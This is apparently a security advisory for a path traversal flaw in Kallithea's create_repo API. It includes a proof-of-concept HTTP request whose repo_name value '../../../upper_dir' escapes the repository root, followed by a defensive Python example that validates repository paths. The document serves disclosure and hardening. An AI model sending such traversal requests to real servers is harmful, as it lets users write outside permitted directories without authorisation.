This vulnerability allows a normal (non-admin) user to create or clone a repository at a filesystem path outside the Kallithea repository root. The repo_name argument of the create_repo API call is not properly validated before it is joined to the repository root, so it can be set to a traversal sequence such as: ../../../upper_dir
More info here.
POC:
A valid API key is required. Replace your_api_key below with it and set Content-Length to the actual length of the body you send.
GET /_admin/api HTTP/1.1
Host: localhost:5000
Connection: close
Content-Length: 126
{"id":1,"api_key":"your_api_key","method":"create_repo","args":{"repo_name":"../../../upper_dir"}}
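The check the PoC bypasses, as an added example that is not Kallithea's own code: the unchecked join shows how ../../../upper_dir lands outside the root, and the hardened helper rejects any repo_name that is absolute, contains empty, "." or ".." segments, or does not resolve strictly below the root. REPO_ROOT, the function names and the JSON-RPC handling are assumptions for illustration; only the request body is taken from the PoC above.

```python
import json
import os

# Added example, not Kallithea's own code. REPO_ROOT is an assumed deployment path.
REPO_ROOT = "/srv/kallithea/repos"


def unchecked_repo_path(repo_root, repo_name):
    """The vulnerable pattern: join the caller-supplied name to the root
    without validation. '../../../upper_dir' escapes the root entirely."""
    return os.path.normpath(os.path.join(repo_root, repo_name))


def safe_repo_path(repo_root, repo_name):
    """Return the absolute on-disk path for repo_name, or None if the name
    would escape repo_root (traversal, absolute path, empty or dot segments)."""
    if not isinstance(repo_name, str) or not repo_name or "\x00" in repo_name:
        return None
    # Treat backslashes as separators too, so 'a\\..\\b' cannot slip past a
    # forward-slash-only check on Windows hosts.
    parts = repo_name.replace("\\", "/").split("/")
    # A leading separator gives an empty first part; os.path.join would
    # otherwise discard repo_root completely for an absolute repo_name.
    if any(part in ("", ".", "..") for part in parts):
        return None
    root = os.path.abspath(repo_root)
    candidate = os.path.abspath(os.path.join(root, *parts))
    # Belt and braces: even after segment filtering, confirm containment.
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def handle_create_repo(repo_root, raw_body):
    """Parse a JSON-RPC create_repo request body (hypothetical handler) and
    return a dict with either 'result' (the path that would be created) or
    'error' (the request was rejected)."""
    try:
        request = json.loads(raw_body)
    except ValueError:
        return {"error": "invalid JSON"}
    if request.get("method") != "create_repo":
        return {"error": "unsupported method"}
    args = request.get("args") or {}
    path = safe_repo_path(repo_root, args.get("repo_name"))
    if path is None:
        return {"error": "repo_name must be a relative path inside the repository root"}
    return {"result": path}


# Constructed input: the request body from the PoC above.
POC_BODY = ('{"id":1,"api_key":"your_api_key","method":"create_repo",'
            '"args":{"repo_name":"../../../upper_dir"}}')

if __name__ == "__main__":
    print("unchecked:", unchecked_repo_path(REPO_ROOT, "../../../upper_dir"))
    print("hardened: ", handle_create_repo(REPO_ROOT, POC_BODY))
    benign = json.dumps({"id": 1, "api_key": "k", "method": "create_repo",
                         "args": {"repo_name": "group/project"}})
    print("benign:   ", handle_create_repo(REPO_ROOT, benign))
```

Rejecting ".." segments outright, rather than only checking the normalized result, is deliberate: a name like group/../other normalizes to a path inside the root, but there is no legitimate reason for an API client to send it, and refusing it keeps the rule easy to audit.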